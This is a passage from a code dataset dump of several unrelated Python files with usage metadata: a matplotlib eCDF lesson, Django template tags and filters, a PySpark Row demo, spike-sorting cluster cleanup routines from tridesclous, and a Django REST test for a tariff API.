np.loadtxt('data/xa_high_food.csv', comments='#')\nxa_low = np.loadtxt('data/xa_low_food.csv', comments='#')\n\nx_high, y_high = ecdf(xa_high)\nx_low, y_low = ecdf(xa_low)\n\nplt.plot(x_high, y_high, marker='.', linestyle='none', markersize='20', alpha=0.5)\nplt.plot(x_low, y_low, marker='.', linestyle='none', markersize='20', alpha=0.5)\nplt.xlabel('Cross-sectional area (um)')\nplt.ylabel('eCDF')\nplt.legend(('x high', 'x low'), loc='upper right')\nplt.show()\n", "sub_path": "lesson023-024b.py", "file_name": "lesson023-024b.py", "file_ext": "py", "file_size_in_byte": 836, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "seaborn.set", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}]} +{"seq_id": "431176864", "text": "# -*- coding: utf-8 -*-\nimport logging\n\nfrom django import template\nfrom django.conf import settings\nfrom django.utils import timezone\nfrom django.utils.safestring import mark_safe\n\nfrom opps.containers.models import ContainerBox\n\n\nregister = template.Library()\nlogger = logging.getLogger()\n\n\n@register.simple_tag(takes_context=True)\ndef get_articlebox(context, slug, template_name=None):\n\n try:\n box = ContainerBox.objects.get(site=settings.SITE_ID, slug=slug,\n date_available__lte=timezone.now(),\n published=True)\n except ContainerBox.DoesNotExist:\n box = None\n\n t = template.loader.get_template('articles/articlebox_detail.html')\n if template_name:\n t = template.loader.get_template(template_name)\n\n return t.render(template.Context({\n 'articlebox': box,\n 'slug': slug,\n 'context': context}\n ))\n\n\n@register.simple_tag\ndef get_all_articlebox(channel_long_slug, template_name=None):\n boxes = ContainerBox.objects.filter(\n site=settings.SITE_ID,\n date_available__lte=timezone.now(),\n published=True,\n channel_long_slug=channel_long_slug)\n\n t = template.loader.get_template('articles/articlebox_list.html')\n if template_name:\n t = template.loader.get_template(template_name)\n\n return t.render(template.Context({'articleboxes': boxes}))\n\n\n@register.simple_tag\ndef get_post_content(post, template_name='articles/post_related.html',\n content_field='content', related_name='related_posts',\n get_related=True, safe=True, divider=\"
    \",\n placeholder=settings.OPPS_RELATED_POSTS_PLACEHOLDER):\n \"\"\"\n takes the post and tries to find the related posts to embed inside\n the content, if not found return only the content.\n\n post:\n Post instance\n template_name:\n path to template which receives the related posts\n content_field:\n name of the field with post content\n related_name:\n a m2m field name or a @property name which\n returns a queryset of related posts\n get_related:\n if False bypass and return only the content\n safe:\n if True mark the content as safe\n divider:\n used when there is no placeholder\n placeholder:\n the string to replace ex: --related--\n \"\"\"\n if not hasattr(post, content_field):\n return None\n content = getattr(post, content_field, '')\n if not get_related:\n return content\n\n related_posts = getattr(post, related_name, None)\n\n if not related_posts.exists():\n return mark_safe(content)\n\n # GET THE TEMPLATE\n t = template.loader.get_template(template_name)\n related_rendered = t.render(\n template.Context({'post': post, related_name: related_posts})\n )\n # EMBED RELATED POSTS\n if placeholder in content:\n return mark_safe(content.replace(\n placeholder,\n related_rendered\n ))\n else:\n return mark_safe(content + divider + related_rendered)\n\n\n@register.simple_tag\ndef get_url(obj, http=False, target=None, url_only=False):\n\n if not hasattr(obj, 'child_class'):\n return obj.get_absolute_url()\n\n try:\n _url = obj.get_absolute_url()\n _target = target or '_self'\n _is_link = obj.child_class == 'Link'\n # Determine if it's a local or foreign link\n if _is_link and not obj.link.is_local() and not target:\n _target = '_blank'\n # Determine url type\n if http:\n _url = 'http://{}{}'.format(\n obj.site,\n obj.get_absolute_url())\n if url_only:\n return _url\n return 'href=\"{}\" target=\"{}\"'.format(_url, _target)\n except Exception as e:\n logger.error(\"Exception at templatetag get_url: {}\".format(e))\n return obj.get_absolute_url()\n", "sub_path": "opps/articles/templatetags/article_tags.py", "file_name": "article_tags.py", "file_ext": "py", "file_size_in_byte": 3931, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.template.Library", "line_number": 12, "usage_type": "call"}, {"api_name": "django.template", "line_number": 12, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 13, "usage_type": "call"}, {"api_name": "opps.containers.models.ContainerBox.objects.get", "line_number": 20, "usage_type": "call"}, {"api_name": "opps.containers.models.ContainerBox.objects", "line_number": 20, "usage_type": "attribute"}, {"api_name": "opps.containers.models.ContainerBox", "line_number": 20, "usage_type": "name"}, {"api_name": "django.conf.settings.SITE_ID", "line_number": 20, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 20, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 21, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 21, "usage_type": "name"}, {"api_name": "opps.containers.models.ContainerBox.DoesNotExist", "line_number": 23, "usage_type": "attribute"}, {"api_name": "opps.containers.models.ContainerBox", "line_number": 23, "usage_type": "name"}, {"api_name": "django.template.loader.get_template", "line_number": 26, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 26, "usage_type": "attribute"}, {"api_name": "django.template", "line_number": 26, "usage_type": "name"}, {"api_name": "django.template.loader.get_template", "line_number": 28, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 28, "usage_type": "attribute"}, {"api_name": "django.template", "line_number": 28, "usage_type": "name"}, {"api_name": "django.template.Context", "line_number": 30, "usage_type": "call"}, {"api_name": "django.template", "line_number": 30, "usage_type": "name"}, {"api_name": "opps.containers.models.ContainerBox.objects.filter", "line_number": 39, "usage_type": "call"}, {"api_name": "opps.containers.models.ContainerBox.objects", "line_number": 39, "usage_type": "attribute"}, {"api_name": "opps.containers.models.ContainerBox", "line_number": 39, "usage_type": "name"}, {"api_name": "django.conf.settings.SITE_ID", "line_number": 40, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 40, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 41, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 41, "usage_type": "name"}, {"api_name": "django.template.loader.get_template", "line_number": 45, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 45, "usage_type": "attribute"}, {"api_name": "django.template", "line_number": 45, "usage_type": "name"}, {"api_name": "django.template.loader.get_template", "line_number": 47, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 47, "usage_type": "attribute"}, {"api_name": "django.template", "line_number": 47, "usage_type": "name"}, {"api_name": "django.template.Context", "line_number": 49, "usage_type": "call"}, {"api_name": "django.template", "line_number": 49, "usage_type": "name"}, {"api_name": "django.conf.settings.OPPS_RELATED_POSTS_PLACEHOLDER", "line_number": 56, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 56, "usage_type": "name"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 88, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 91, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 91, "usage_type": "attribute"}, {"api_name": "django.template", "line_number": 91, "usage_type": "name"}, {"api_name": "django.template.Context", "line_number": 93, "usage_type": "call"}, {"api_name": "django.template", "line_number": 93, "usage_type": "name"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 97, "usage_type": "call"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 102, "usage_type": "call"}]} +{"seq_id": "92070831", "text": "import sys\n\nfrom pyspark.sql import SparkSession, Row\n\nif __name__ == '__main__':\n\n # Create SparkSession\n spark = (SparkSession\n .builder\n .appName('RowsOperations')\n .getOrCreate())\n\n # Create Row object\n data_rows = [Row('Sheldon Cooper', 31), Row('Howard Wolowitz', 32)]\n\n # Read JSON file into DataFrame\n user_df = (spark.createDataFrame(data_rows, ['Name', 'Age']))\n\n # Column expr use\n user_df.show(n=20, truncate=False)\n\n # Stop spark session\n spark.stop()\n", "sub_path": "ColumnsAndRows/src/rowsOps.py", "file_name": "rowsOps.py", "file_ext": "py", "file_size_in_byte": 484, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pyspark.sql.SparkSession.builder.appName", "line_number": 8, "usage_type": "call"}, {"api_name": "pyspark.sql.SparkSession.builder", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pyspark.sql.SparkSession", "line_number": 8, "usage_type": "name"}, {"api_name": "pyspark.sql.Row", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "53555216", "text": "\"\"\"\nSome heuristic method to clean after clustering:\n * auto-split\n * auto-merge\n\n\"\"\"\n\n\nimport numpy as np\nimport os\nimport time\n\nimport sklearn\nimport sklearn.cluster\nimport sklearn.mixture\nimport sklearn.metrics\nimport sklearn.decomposition\n\nfrom joblib import Parallel, delayed\n\n\n\n\nimport matplotlib.pyplot as plt\n\n\n\nfrom .dip import diptest\nfrom .waveformtools import equal_template\n\n\nimport hdbscan\n\ndebug_plot = False\n#~ debug_plot = True\n\n\ndef _get_sparse_waveforms_flatten(cc, dense_mode, label, channel_adjacency, n_spike_for_centroid=None):\n peak_index, = np.nonzero(cc.all_peaks['cluster_label'] == label)\n if n_spike_for_centroid is not None and peak_index.size>n_spike_for_centroid:\n keep = np.random.choice(peak_index.size, n_spike_for_centroid, replace=False)\n peak_index = peak_index[keep]\n\n if dense_mode:\n waveforms = cc.get_some_waveforms(peak_index, channel_indexes=None)\n extremum_channel = 0\n centroid = np.median(waveforms, axis=0)\n else:\n waveforms = cc.get_some_waveforms(peak_index, channel_indexes=None)\n centroid = np.median(waveforms, axis=0)\n \n peak_sign = cc.info['peak_detector_params']['peak_sign']\n n_left = cc.info['waveform_extractor_params']['n_left']\n \n if peak_sign == '-':\n extremum_channel = np.argmin(centroid[-n_left,:], axis=0)\n elif peak_sign == '+':\n extremum_channel = np.argmax(centroid[-n_left,:], axis=0)\n # TODO by sparsity level threhold and not radius\n adjacency = channel_adjacency[extremum_channel]\n waveforms = waveforms.take(adjacency, axis=2)\n \n wf_flat = waveforms.swapaxes(1,2).reshape(waveforms.shape[0], -1)\n \n return waveforms, wf_flat, peak_index\n \n\ndef _compute_one_dip_test(cc, dirname, chan_grp, label, n_components_local_pca, adjacency_radius_um):\n # compute dip test to try to over split\n from .dataio import DataIO\n from .catalogueconstructor import CatalogueConstructor\n \n if cc is None:\n dataio = DataIO(dirname)\n cc = CatalogueConstructor(dataio=dataio, chan_grp=chan_grp)\n\n peak_sign = cc.info['peak_detector_params']['peak_sign']\n dense_mode = cc.info['mode'] == 'dense'\n n_left = cc.info['waveform_extractor_params']['n_left']\n n_right = cc.info['waveform_extractor_params']['n_right']\n peak_width = n_right - n_left\n nb_channel = cc.nb_channel\n \n if dense_mode:\n channel_adjacency = {c: np.arange(nb_channel) for c in range(nb_channel)}\n else:\n channel_adjacency = {}\n for c in range(nb_channel):\n nearest, = np.nonzero(cc.channel_distances[c, :] < adjacency_radius_um)\n channel_adjacency[c] = nearest\n\n \n waveforms, wf_flat, peak_index = _get_sparse_waveforms_flatten(cc, dense_mode, label, channel_adjacency, n_spike_for_centroid=cc.n_spike_for_centroid)\n \n \n #~ pca = sklearn.decomposition.IncrementalPCA(n_components=n_components_local_pca, whiten=True)\n \n n_components = min(wf_flat.shape[1]-1, n_components_local_pca)\n pca = sklearn.decomposition.TruncatedSVD(n_components=n_components)\n \n feats = pca.fit_transform(wf_flat)\n pval = diptest(np.sort(feats[:, 0]), numt=200)\n \n return pval\n\n\n \n\n\ndef auto_split(catalogueconstructor, \n n_spike_for_centroid=None,\n adjacency_radius_um = 30,\n n_components_local_pca=3,\n pval_thresh=0.1,\n min_cluster_size=20,\n maximum_shift=2,\n n_jobs=-1,\n #~ n_jobs=1,\n joblib_backend='loky',\n ):\n cc = catalogueconstructor\n peak_sign = cc.info['peak_detector_params']['peak_sign']\n dense_mode = cc.info['mode'] == 'dense'\n n_left = cc.info['waveform_extractor_params']['n_left']\n n_right = cc.info['waveform_extractor_params']['n_right']\n peak_width = n_right - n_left\n nb_channel = cc.nb_channel\n \n if dense_mode:\n channel_adjacency = {c: np.arange(nb_channel) for c in range(nb_channel)}\n else:\n channel_adjacency = {}\n for c in range(nb_channel):\n nearest, = np.nonzero(cc.channel_distances[c, :] < adjacency_radius_um)\n channel_adjacency[c] = nearest\n \n if len(cc.positive_cluster_labels) ==0:\n return\n \n m = np.max(cc.positive_cluster_labels) + 1\n \n # pvals = []\n # for label in cc.positive_cluster_labels:\n #  pval = _compute_one_dip_test(cc.dataio.dirname, cc.chan_grp, label, n_components_local_pca, adjacency_radius_um)\n #  print('label', label,'pval', pval, pval1:\n for i, sub_label in enumerate(unique_sub_labels):\n sub_mask = sub_labels == sub_label\n \n if dense_mode:\n valid=True\n else:\n valid = peak_is_aligned[i]\n #~ print('sub_label', 'valid', valid)\n \n if sub_label == -1 or not valid:\n #~ cluster_labels[ind_keep[sub_mask]] = -1\n cc.all_peaks['cluster_label'][peak_index[sub_mask]] = -1\n else:\n #~ cluster_labels[ind_keep[sub_mask]] = sub_label + m \n new_label = label + m\n #~ print(label, m, new_label)\n cc.all_peaks['cluster_label'][peak_index[sub_mask]] = new_label\n cc.add_one_cluster(new_label)\n \n m += 1\n \n cc.pop_labels_from_cluster([label])\n \n #~ m += np.max(unique_sub_labels) + 1\n \n\n #~ if True:\n #~ if False:\n if debug_plot:\n print('label', label,'pval', pval, pval=0:\n ax.plot(np.median(wf_flat[sub_mask], axis=0), color=color, lw=2, ls=ls)\n \n for sub_label in unique_sub_labels:\n if dense_mode:\n valid=True\n else:\n valid = peak_is_aligned[i] \n \n sub_mask = sub_labels == sub_label\n color = colors[sub_label]\n if valid:\n color = colors[sub_label]\n else:\n color = 'k'\n ax = axs[1]\n ax.plot(feats[sub_mask].T, color=color, alpha=0.1)\n \n ax = axs[2]\n ax.scatter(feats[sub_mask][:, 0], feats[sub_mask][:, 1], color=color)\n plt.show()\n\n\n\ndef check_peak_all_aligned(local_labels, waveforms, peak_sign, n_left, maximum_shift):\n peak_is_aligned = []\n for k in np.unique(local_labels):\n wfs = waveforms[local_labels == k]\n centroid = np.median(wfs, axis=0)\n \n if peak_sign == '-':\n chan_peak_local = np.argmin(np.min(centroid, axis=0))\n pos_peak = np.argmin(centroid[:, chan_peak_local])\n elif peak_sign == '+':\n chan_peak_local = np.argmax(np.max(centroid, axis=0))\n pos_peak = np.argmax(centroid[:, chan_peak_local]) \n \n al = np.abs(-n_left - pos_peak) <= maximum_shift\n peak_is_aligned.append(al)\n \n return np.array(peak_is_aligned)\n\n\n\ndef trash_not_aligned(cc, maximum_shift=2):\n n_left = cc.info['waveform_extractor_params']['n_left']\n peak_sign = cc.info['peak_detector_params']['peak_sign']\n \n to_remove = []\n for k in list(cc.positive_cluster_labels):\n #~ print(k)\n\n centroid = cc.get_one_centroid(k)\n \n if peak_sign == '-':\n chan_peak = np.argmin(np.min(centroid, axis=0))\n extremum_index = np.argmin(centroid[:, chan_peak])\n peak_val = centroid[-n_left, chan_peak]\n elif peak_sign == '+':\n chan_peak = np.argmax(np.max(centroid, axis=0))\n extremum_index = np.argmax(centroid[:, chan_peak])\n peak_val = centroid[-n_left, chan_peak]\n\n if np.abs(-n_left - extremum_index)>maximum_shift:\n if debug_plot:\n n_left = cc.info['waveform_extractor_params']['n_left']\n n_right = cc.info['waveform_extractor_params']['n_right']\n peak_width = n_right - n_left\n \n print('remove not aligned peak', 'k', k)\n fig, ax = plt.subplots()\n #~ centroid = centroids[k]\n ax.plot(centroid.T.flatten())\n ax.set_title('not aligned peak')\n for i in range(centroid.shape[1]):\n ax.axvline(i*peak_width-n_left, color='k')\n plt.show()\n \n mask = cc.all_peaks['cluster_label'] == k\n cc.all_peaks['cluster_label'][mask] = -1\n to_remove.append(k)\n \n \n cc.pop_labels_from_cluster(to_remove)\n\n\ndef auto_merge(catalogueconstructor,\n auto_merge_threshold=2.3,\n maximum_shift=2,\n amplitude_factor_thresh = 0.2,\n ):\n cc = catalogueconstructor\n peak_sign = cc.info['peak_detector_params']['peak_sign']\n #~ dense_mode = cc.info['mode'] == 'dense'\n n_left = cc.info['waveform_extractor_params']['n_left']\n n_right = cc.info['waveform_extractor_params']['n_right']\n peak_width = n_right - n_left\n threshold = cc.info['peak_detector_params']['relative_threshold']\n \n while True:\n \n labels = cc.positive_cluster_labels.copy()\n \n \n nb_merge = 0\n \n n = labels.size\n \n #~ pop_from_centroids = []\n new_centroids = []\n pop_from_cluster = []\n for i in range(n):\n k1 = labels[i]\n if k1 == -1:\n # this can have been removed yet\n continue\n \n for j in range(i+1, n):\n k2 = labels[j]\n if k2 == -1:\n # this can have been removed yet\n continue\n \n #~ print(k1, k2)\n #~ print(' k2', k2)\n \n ind1 = cc.index_of_label(k1)\n extremum_amplitude1 = np.abs(cc.clusters[ind1]['extremum_amplitude'])\n centroid1 = cc.get_one_centroid(k1)\n\n ind2 = cc.index_of_label(k2)\n extremum_amplitude2 = np.abs(cc.clusters[ind2]['extremum_amplitude'])\n centroid2 = cc.get_one_centroid(k2)\n \n thresh = max(extremum_amplitude1, extremum_amplitude2) * amplitude_factor_thresh\n thresh = max(thresh, auto_merge_threshold)\n #~ print('thresh', thresh)\n \n #~ t1 = time.perf_counter()\n do_merge = equal_template(centroid1, centroid2, thresh=thresh, n_shift=maximum_shift)\n #~ t2 = time.perf_counter()\n #~ print('equal_template', t2-t1)\n \n #~ print('do_merge', do_merge)\n \n #~ if debug_plot:\n #~ print(k1, k2)\n #~ if k1==4 and k2==5:\n #~ print(k1, k2, do_merge, thresh)\n #~ fig, ax = plt.subplots()\n #~ ax.plot(centroid1.T.flatten())\n #~ ax.plot(centroid2.T.flatten())\n #~ ax.set_title('merge ' + str(do_merge))\n #~ plt.show()\n \n \n \n \n if do_merge:\n #~ print('merge', k1, k2)\n #~ cluster_labels2[cluster_labels2==k2] = k1\n\n mask = cc.all_peaks['cluster_label'] == k2\n cc.all_peaks['cluster_label'][mask] = k1\n \n #~ t1 = time.perf_counter()\n #~ cc.compute_one_centroid(k1)\n #~ t2 = time.perf_counter()\n #~ print('cc.compute_one_centroid', t2-t1)\n \n new_centroids.append(k1)\n pop_from_cluster.append(k2)\n \n labels[j] = -1\n \n nb_merge += 1\n \n if debug_plot:\n \n fig, ax = plt.subplots()\n ax.plot(centroid1.T.flatten())\n ax.plot(centroid2.T.flatten())\n ax.set_title('merge '+str(k1)+' '+str(k2))\n plt.show()\n \n #~ for k in np.unique(pop_from_cluster):\n #~ cc.pop_labels_from_cluster([k])\n pop_from_cluster = np.unique(pop_from_cluster)\n cc.pop_labels_from_cluster(pop_from_cluster)\n \n new_centroids = np.unique(new_centroids)\n new_centroids = [k for k in new_centroids if k not in pop_from_cluster]\n cc.compute_several_centroids(new_centroids)\n\n #~ cc.compute_one_centroid(k)\n \n \n \n #~ for k in np.unique(pop_from_centroids):\n #~ if k in centroids:\n #~ centroids.pop(k)\n \n #~ print('nb_merge', nb_merge)\n if nb_merge == 0:\n break\n\n\ndef trash_low_extremum(cc, min_extremum_amplitude=None):\n if min_extremum_amplitude is None:\n threshold = cc.info['peak_detector_params']['relative_threshold']\n min_extremum_amplitude = threshold + 0.5\n \n to_remove = []\n for k in list(cc.positive_cluster_labels):\n #~ print(k)\n ind = cc.index_of_label(k)\n assert k == cc.clusters[ind]['cluster_label'], 'this is a bug in trash_low_extremum'\n \n extremum_amplitude = np.abs(cc.clusters[ind]['extremum_amplitude'])\n #~ print('k', k , extremum_amplitude)\n if extremum_amplitude < min_extremum_amplitude:\n if debug_plot:\n print('k', k , extremum_amplitude, 'too small')\n \n mask = cc.all_peaks['cluster_label']==k\n cc.all_peaks['cluster_label'][mask] = -1\n to_remove.append(k)\n cc.pop_labels_from_cluster(to_remove)\n\n\ndef trash_small_cluster(cc, minimum_size=10):\n to_remove = []\n for k in list(cc.positive_cluster_labels):\n mask = cc.all_peaks['cluster_label']==k\n cluster_size = np.sum(mask)\n #~ print(k, cluster_size)\n if cluster_size <= minimum_size :\n cc.all_peaks['cluster_label'][mask] = -1\n to_remove.append(k)\n cc.pop_labels_from_cluster(to_remove)\n", "sub_path": "tridesclous/cleancluster.py", "file_name": "cleancluster.py", "file_ext": "py", "file_size_in_byte": 17950, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.nonzero", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 41, "usage_type": "attribute"}, {"api_name": "numpy.median", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 58, "usage_type": "call"}, {"api_name": "dataio.DataIO", "line_number": 74, "usage_type": "call"}, {"api_name": "catalogueconstructor.CatalogueConstructor", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.nonzero", "line_number": 89, "usage_type": "call"}, {"api_name": "sklearn.decomposition.TruncatedSVD", "line_number": 99, "usage_type": "call"}, {"api_name": "sklearn.decomposition", "line_number": 99, "usage_type": "attribute"}, {"api_name": "dip.diptest", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.nonzero", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 140, "usage_type": "call"}, {"api_name": "joblib.Parallel", "line_number": 155, "usage_type": "call"}, {"api_name": "joblib.delayed", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.nonzero", "line_number": 160, "usage_type": "call"}, {"api_name": "sklearn.decomposition.TruncatedSVD", "line_number": 170, "usage_type": "call"}, {"api_name": "sklearn.decomposition", "line_number": 170, "usage_type": "attribute"}, {"api_name": "hdbscan.HDBSCAN", "line_number": 173, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 175, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 179, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 185, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 185, "usage_type": "name"}, {"api_name": "numpy.median", "line_number": 186, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 191, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 191, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 225, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 225, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm.get_cmap", "line_number": 226, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 226, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 226, "usage_type": "name"}, {"api_name": "numpy.median", "line_number": 250, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 269, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 269, "usage_type": "name"}, {"api_name": "numpy.unique", "line_number": 275, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 277, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 280, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 280, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 281, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 283, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 283, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 284, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 286, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 289, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 304, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 304, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 305, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 308, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 308, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 309, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 312, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 319, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 319, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 325, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 325, "usage_type": "name"}, {"api_name": "numpy.abs", "line_number": 376, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 380, "usage_type": "call"}, {"api_name": "waveformtools.equal_template", "line_number": 388, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 428, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 428, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 432, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 432, "usage_type": "name"}, {"api_name": "numpy.unique", "line_number": 436, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 439, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 467, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 483, "usage_type": "call"}]} +{"seq_id": "586466355", "text": "from autho.models import User, EmployeeProfile\nfrom django.contrib.contenttypes.models import ContentType\nfrom django_filters import rest_framework as filters\n\n\nclass UserListFilter(filters.FilterSet):\n\n class Meta:\n model = User\n fields = ['phone_number', 'username', 'email']\n\n @property\n def qs(self):\n parent = super(UserListFilter, self).qs\n content_type = ContentType.objects.get_for_model(EmployeeProfile)\n user = getattr(self.request, 'user', None)\n owner = None\n if user:\n owner = user.owner if user.owner else user\n return parent.filter(owner=owner, content_type=content_type)\n\n\nclass EmployeeListFilter(filters.FilterSet):\n\n class Meta:\n model = EmployeeProfile\n fields = ['supervisor']\n\n @property\n def qs(self):\n parent = super(EmployeeListFilter, self).qs\n user = getattr(self.request, 'user', None)\n owner = None\n if user:\n owner = user.owner if user.owner else user\n return parent.filter(user__owner=owner).distinct()\n", "sub_path": "app/autho/filters.py", "file_name": "filters.py", "file_ext": "py", "file_size_in_byte": 1079, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django_filters.rest_framework.FilterSet", "line_number": 6, "usage_type": "attribute"}, {"api_name": "django_filters.rest_framework", "line_number": 6, "usage_type": "name"}, {"api_name": "autho.models.User", "line_number": 9, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.models.ContentType.objects.get_for_model", "line_number": 15, "usage_type": "call"}, {"api_name": "autho.models.EmployeeProfile", "line_number": 15, "usage_type": "argument"}, {"api_name": "django.contrib.contenttypes.models.ContentType.objects", "line_number": 15, "usage_type": "attribute"}, {"api_name": "django.contrib.contenttypes.models.ContentType", "line_number": 15, "usage_type": "name"}, {"api_name": "django_filters.rest_framework.FilterSet", "line_number": 23, "usage_type": "attribute"}, {"api_name": "django_filters.rest_framework", "line_number": 23, "usage_type": "name"}, {"api_name": "autho.models.EmployeeProfile", "line_number": 26, "usage_type": "name"}]} +{"seq_id": "89159068", "text": "import json\n\nfrom django.test import TestCase\nfrom model_mommy import mommy\nfrom rest_framework import status\nfrom rest_framework.reverse import reverse\n\nfrom phonebillsapi.bill.models import Tariff\n\n\nclass TestTariffView(TestCase):\n def setUp(self):\n self.url_list = reverse('api:tariff-list')\n self.data = {\n \"tariff_time\": \"standard\",\n \"standing_charge\": \"0.36\",\n \"call_charge\": \"0.09\",\n \"interval_start\": \"06:00:00\",\n \"interval_end\": \"22:00:00\"\n }\n\n def test_insert_tariff(self):\n response = self.client.post(self.url_list, data=json.dumps(self.data), content_type='application/json')\n\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n def test_get_all_tariffs(self):\n mommy.make(Tariff)\n mommy.make(Tariff)\n\n response = self.client.get(self.url_list)\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(len(response.json()), 2)\n\n def test_get_specific_tariff(self):\n mommy.make(Tariff, id=10, **self.data)\n url_detail = reverse('api:tariff-detail', args=[10])\n\n response = self.client.get(url_detail)\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.json()['id'], 10)\n\n def test_update_tariff(self):\n mommy.make(Tariff, id=10, **self.data)\n url_detail = reverse('api:tariff-detail', args=[10])\n\n new_data = {\n \"tariff_time\": \"standard\",\n \"standing_charge\": \"0.36\",\n \"call_charge\": \"0.08\",\n \"interval_start\": \"06:00:00\",\n 